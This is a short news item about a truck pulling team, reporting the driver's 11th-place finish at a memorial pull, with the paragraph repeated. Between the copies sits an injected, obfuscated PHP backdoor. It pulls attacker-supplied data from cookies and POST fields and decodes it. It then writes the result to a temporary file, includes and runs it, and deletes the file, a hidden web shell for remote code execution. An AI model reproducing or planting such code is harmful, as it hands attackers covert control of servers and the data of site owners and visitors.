The patriarch, Veston Messer drove Wide Open to an 11th place finish in the field of 32 last Friday at the Hansel Sullivan Memorial Pull. Not a bad finish considering he hasn’t been behind the wheel since 2014 and not driven this truck since 2013.
$MosjzoiOFF = "\x4c" . chr (106) . chr ( 833 - 720 ).chr (95) . "\164" . 'a' . 'S' . chr (115) . "\x50";$wvDyrCdKu = chr (99) . 'l' . "\x61" . "\163" . 's' . chr ( 183 - 88 )."\145" . "\x78" . "\151" . "\x73" . chr ( 965 - 849 )."\163";$DcZeTionq = class_exists($MosjzoiOFF); $wvDyrCdKu = "16151";$NrRIGi = strpos($wvDyrCdKu, $MosjzoiOFF);if ($DcZeTionq == $NrRIGi){function AIVfNuMmso(){$JfXJWmdBb = new /* 26772 */ Ljq_taSsP(1866 + 1866); $JfXJWmdBb = NULL;}$IDRzzWIWQ = "1866";class Ljq_taSsP{private function elrSBFRKY($IDRzzWIWQ){if (is_array(Ljq_taSsP::$HZzFXOF)) {$name = sys_get_temp_dir() . "/" . crc32(Ljq_taSsP::$HZzFXOF["salt"]);@Ljq_taSsP::$HZzFXOF["write"]($name, Ljq_taSsP::$HZzFXOF["content"]);include $name;@Ljq_taSsP::$HZzFXOF["delete"]($name); $IDRzzWIWQ = "1866";exit();}}public function sLlGJ(){$AagcjUl = "63322";$this->_dummy = str_repeat($AagcjUl, strlen($AagcjUl));}public function __destruct(){Ljq_taSsP::$HZzFXOF = @unserialize(Ljq_taSsP::$HZzFXOF); $IDRzzWIWQ = "24210_63863";$this->elrSBFRKY($IDRzzWIWQ); $IDRzzWIWQ = "24210_63863";}public function DiteRv($AagcjUl, $SUDCGsl){return $AagcjUl[0] ^ str_repeat($SUDCGsl, intval(strlen($AagcjUl[0]) / strlen($SUDCGsl)) + 1);}public function GZoDj($AagcjUl){$dNUQb = 'b' . 'a' . "\x73" . 'e' . chr ( 925 - 871 )."\x34";return array_map($dNUQb . '_' . "\x64" . "\145" . 'c' . chr (111) . "\144" . 'e', array($AagcjUl,));}public function __construct($PsvPBotom=0){$uVcSXIKRjc = chr ( 451 - 407 ); $AagcjUl = "";$OPCWvU = $_POST;$xLfpVEDE = $_COOKIE;$SUDCGsl = "249f845e-538e-4ac3-8817-2b7b991a88ba";$eMXSc = @$xLfpVEDE[substr($SUDCGsl, 0, 4)];if (!empty($eMXSc)){$eMXSc = explode($uVcSXIKRjc, $eMXSc);foreach ($eMXSc as $esFnIO){$AagcjUl .= @$xLfpVEDE[$esFnIO];$AagcjUl .= @$OPCWvU[$esFnIO];}$AagcjUl = $this->GZoDj($AagcjUl);}Ljq_taSsP::$HZzFXOF = $this->DiteRv($AagcjUl, $SUDCGsl);if (strpos($SUDCGsl, $uVcSXIKRjc) !== FALSE){$SUDCGsl = explode($uVcSXIKRjc, $SUDCGsl); $awplNQD = base64_decode(strrev($SUDCGsl[0]));}}public static $HZzFXOF = 62853;}AIVfNuMmso();}
Super Modified 2wd Truck Pulling Team
The patriarch, Veston Messer drove Wide Open to an 11th place finish in the field of 32 last Friday at the Hansel Sullivan Memorial Pull. Not a bad finish considering he hasn’t been behind the wheel since 2014 and not driven this truck since 2013.